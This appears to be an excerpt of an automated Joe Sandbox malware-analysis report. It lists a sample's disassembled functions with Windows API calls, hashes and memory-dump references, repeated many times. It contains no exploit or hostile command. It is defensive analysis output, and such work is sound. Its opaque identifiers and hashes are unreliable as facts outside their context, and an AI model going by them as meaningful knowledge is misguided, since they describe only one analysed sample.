                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 1682464887-234962358
                                                                                                                                                    • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                    • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                                                                    • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                                                                    • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                                                                    Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 2507767853-234962358
                                                                                                                                                    • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                    • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                                                                    • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                                                                    • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                                                                    Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 2507767853-234962358
                                                                                                                                                    • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                    • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                                                                    • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                                                                    • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                                                                    Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                                    • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                    • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                                                                    • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                                                                    • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                                                                    Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                                                                    • String ID: crts
                                                                                                                                                    • API String ID: 943502515-3724388283
                                                                                                                                                    • Opcode ID: 75fc9d2b20a0c1d41b1dbefb082d5918fb6b1a56ad17f55ff511dc9fe1167c88
                                                                                                                                                    • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                                                                    • Opcode Fuzzy Hash: 75fc9d2b20a0c1d41b1dbefb082d5918fb6b1a56ad17f55ff511dc9fe1167c88
                                                                                                                                                    • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                                                                    Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                                                                    • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$LabelVolume
                                                                                                                                                    • String ID: \VH
                                                                                                                                                    • API String ID: 2006950084-234962358
                                                                                                                                                    • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                    • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                                                    Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                                                    • DrawMenuBar.USER32 ref: 00449761
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 772068139-4108050209
                                                                                                                                                    • Opcode ID: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                                                                                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                                                    • Opcode Fuzzy Hash: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                                                                                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                                                    Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$_wcscpy
                                                                                                                                                    • String ID: 3, 3, 8, 1
                                                                                                                                                    • API String ID: 3469035223-357260408
                                                                                                                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                                                    Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                                                    • API String ID: 2574300362-3530519716
                                                                                                                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                                                    Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                                                    • API String ID: 2574300362-275556492
                                                                                                                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                                                    Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                                                    • API String ID: 2574300362-58917771
                                                                                                                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                                                    Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                                                    Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2808897238-0
                                                                                                                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                                    Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                                    • __itow.LIBCMT ref: 004699CD
                                                                                                                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
